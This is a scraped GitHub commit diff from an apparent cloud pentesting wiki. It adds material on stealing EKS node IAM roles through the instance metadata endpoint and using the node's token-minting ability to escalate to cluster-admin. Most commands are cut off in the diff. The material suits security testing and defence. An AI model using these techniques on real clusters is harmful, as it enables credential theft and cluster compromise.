You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
-[https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - Check also its checklist in [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits)
14
+
5
15
## Basic Information
6
16
7
17
In this page you will find:
@@ -569,15 +579,6 @@ An organization in GitHub is very proactive in reporting accounts to GitHub. All
569
579
> [!WARNING]
570
580
> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
571
581
572
-
## Tools
573
-
574
-
The following tools are useful to find Github Action workflows and even find vulnerable ones:
Copy file name to clipboardExpand all lines: src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
+25-3Lines changed: 25 additions & 3 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -287,11 +287,18 @@ for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -
287
287
done | grep -B 1 "amazonaws.com"
288
288
```
289
289
290
-
### Node IAM Role
290
+
### Node IAM Role to cluster-admin
291
291
292
-
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
292
+
The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have an IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_).
293
293
294
-
There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:
294
+
To access the node metadata endpoint you need to:
295
+
- Be in a pod and have the metadata endpoint configured to at least 2 tcp hops. This is the most common misconfiguration as usually different pods in the cluster will require access to the metadata endpoint to not break and several companies just decide to allow access to the metadata endpoint from all the pods in the cluster.
296
+
- Be in a pod with `hostNetwork` enabled.
297
+
- Escape to the node and access the metadata endpoint directly.
298
+
299
+
(Note that the metadata endpoint is at 169.254.169.254 as always).
300
+
301
+
To **escape to the node** you can use the following command to run a pod with `hostNetwork` enabled:
@@ -314,6 +321,21 @@ if [ "$IAM_ROLE_NAME" ]; then
314
321
fi
315
322
```
316
323
324
+
### Privesc to cluster-admin
325
+
326
+
Iin summary: if it's possible to **access the EKS Node IAM role** from a pod, it's possible to **compromise the full kubernetes cluster**.
327
+
328
+
For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). As summary, the default IAM EKS role that is assigned to the EKS nodes by default is assigned the role `system:node` inside the cluster. This role is very interesting although is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction).
329
+
330
+
However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in:
0 commit comments